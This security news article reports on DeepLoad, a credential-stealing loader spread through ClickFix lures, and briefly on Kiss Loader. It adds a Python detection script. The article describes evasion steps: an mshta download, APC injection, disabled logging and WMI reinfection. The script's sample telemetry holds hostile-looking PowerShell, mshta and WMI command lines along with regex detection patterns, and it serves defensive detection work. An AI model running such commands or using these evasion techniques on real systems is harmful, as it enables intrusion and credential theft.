A recently observed campaign uses the ClickFix social-engineering technique to distribute a previously undocumented malware loader tracked as DeepLoad.
According to ReliaQuest researchers Thassanai McCabe and Andrew Currie, the malware combines AI-assisted obfuscation with process injection to evade detection and steal credentials quietly. The loader is designed to keep capturing passwords and sessions even if some of its components are blocked.
The chain starts with a ClickFix lure that, under a false pretext, tricks the user into pasting a PowerShell command into the Windows Run dialog and executing it. That command invokes mshta.exe to fetch and run an obfuscated PowerShell loader.
The loader hides its real logic behind junk variable assignments, apparently to defeat signature- and heuristic-based tooling. The obfuscation layer is believed to have been produced with AI assistance.
To blend in with normal Windows activity, DeepLoad places its payload in an executable named LockAppHost.exe, the name of a legitimate Windows process that manages the lock screen.
It also disables PowerShell command history and calls native Windows API functions directly rather than through cmdlets, sidestepping the logging and monitoring hooks defenders commonly rely on.
Rather than dropping a pre-built binary, DeepLoad builds its second-stage component on the host: it uses PowerShell's Add-Type cmdlet to compile embedded C# source, which yields a DLL with a randomized name in the user's Temp directory and gives static, file-based detection little to match on.
It then uses asynchronous procedure call (APC) injection to run the main payload inside a trusted Windows process, so the decoded payload never has to be written to disk.
On the credential-theft side, DeepLoad harvests browser-stored passwords and installs a malicious browser extension that intercepts credentials as the user logs in. It also watches for connected USB drives and spreads to them under deceptive file names.
DeepLoad further uses WMI to re-execute the infection chain days later, so a host that appears clean can be reinfected, and the time gap breaks the sequence of events that detection logic would otherwise link together. The result is a multi-purpose loader that operates across the kill chain while evading security controls.
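As an added example (not from the ReliaQuest report or this article), the following Python pass runs simple detection logic for the chain described above, from the mshta.exe download through the Add-Type compile and APC P/Invoke to the WMI re-execution, over constructed telemetry loosely modelled on Sysmon process-creation and PowerShell script-block events. The field names, the CommandLineEventConsumer persistence record and the specific API names it looks for are assumptions; the article names none of them.

```python
"""Toy detection pass for a ClickFix -> mshta.exe -> PowerShell -> Add-Type/APC chain.
Added example: the telemetry below is constructed and loosely modelled on Sysmon and
PowerShell operational events; none of it is a real DeepLoad artifact."""

import re
from pathlib import PureWindowsPath

# Constructed sample events. "id" mirrors the event source:
#   1    Sysmon process creation
#   4104 PowerShell script block logging (Microsoft-Windows-PowerShell/Operational)
#   20   Sysmon WMI event consumer registration (a hypothetical persistence record;
#        the article only says WMI is used to re-execute the chain days later)
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"id": 1, "pid": 5312, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://lure.example.invalid/verify.hta"},
    {"id": 1, "pid": 5404, "ppid": 5312,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -c $zq=1;$rt=7;$mm=3;..."},
    {"id": 4104, "pid": 5404, "script": (
        "Set-PSReadLineOption -HistorySaveStyle SaveNothing\n"
        "$src = 'using System; using System.Runtime.InteropServices;"
        " public class N { [DllImport(\"kernel32.dll\")]"
        " public static extern uint QueueUserAPC(IntPtr f, IntPtr h, UIntPtr d); }'\n"
        "Add-Type -TypeDefinition $src\n")},
    {"id": 20, "consumer": "CommandLineEventConsumer",
     "cmdline": "powershell.exe -w hidden -nop -c iex(...)"},
    # Benign noise that must not fire.
    {"id": 1, "pid": 6000, "ppid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"id": 4104, "pid": 6100, "script": "Get-ChildItem C:\\Temp | Remove-Item"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def image_name(path):
    """Lower-case file name of a Windows image path or command token."""
    return PureWindowsPath(path).name.lower()


def detect_process_chain(events):
    """Flag mshta.exe given a URL, and any script host whose parent is mshta.exe.
    The parent link is resolved by PID, as a SIEM does with ProcessId/ParentProcessId."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    hits = []
    for e in procs.values():
        name = image_name(e["image"])
        if name == "mshta.exe" and re.search(r"https?://", e["cmdline"], re.I):
            hits.append(("mshta_remote_url", e["pid"]))
        parent = procs.get(e["ppid"])
        if parent and name in SCRIPT_HOSTS and image_name(parent["image"]) == "mshta.exe":
            hits.append(("mshta_spawned_script_host", e["pid"]))
    return hits


# Script-block indicators. Add-Type alone is common in admin scripts, so a block is
# only reported when at least two indicators co-occur, as they do in the chain above.
SCRIPT_INDICATORS = {
    "history_disabled": re.compile(r"Set-PSReadLineOption\b.*-HistorySaveStyle\s+SaveNothing", re.I),
    "inline_csharp_compile": re.compile(r"Add-Type\b.*-(TypeDefinition|MemberDefinition)\b", re.I),
    "apc_pinvoke": re.compile(r"DllImport[\s\S]*\b(QueueUserAPC|NtQueueApcThread(Ex)?)\b", re.I),
}


def detect_script_blocks(events):
    """Return {pid: sorted indicator names} for 4104 events matching two or more indicators."""
    out = {}
    for e in events:
        if e["id"] != 4104:
            continue
        found = sorted(n for n, rx in SCRIPT_INDICATORS.items() if rx.search(e["script"]))
        if len(found) >= 2:
            out[e["pid"]] = found
    return out


def detect_wmi_consumer(events):
    """Flag WMI CommandLineEventConsumer registrations whose command is a script host."""
    return [e["cmdline"] for e in events
            if e["id"] == 20 and e.get("consumer") == "CommandLineEventConsumer"
            and image_name(e["cmdline"].split()[0]) in SCRIPT_HOSTS]


def run(events=SAMPLE_EVENTS):
    """Run all three checks and return their hits keyed by rule."""
    return {
        "process_chain": detect_process_chain(events),
        "script_blocks": detect_script_blocks(events),
        "wmi_consumers": detect_wmi_consumer(events),
    }


if __name__ == "__main__":
    for rule, hits in run().items():
        print(rule, hits)
```

The process-chain rule is the high-confidence one: mshta.exe fetching a URL and then spawning a script host is rare in legitimate use. The script-block rule deliberately requires two indicators, because Add-Type with inline C# appears in plenty of administrative scripts and would be noisy on its own; the history-disable and APC P/Invoke indicators only help if script block logging (event 4104) is actually enabled on the host.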
Separately, G DATA detailed a loader called Kiss Loader, distributed through Windows Internet Shortcut (.url) files attached to phishing emails. It reaches out to a remote resource and deploys Venom RAT, likewise using APC injection.
The scale of Kiss Loader activity and its distribution model remain unknown; the threat actor behind it is purportedly based in Malawi.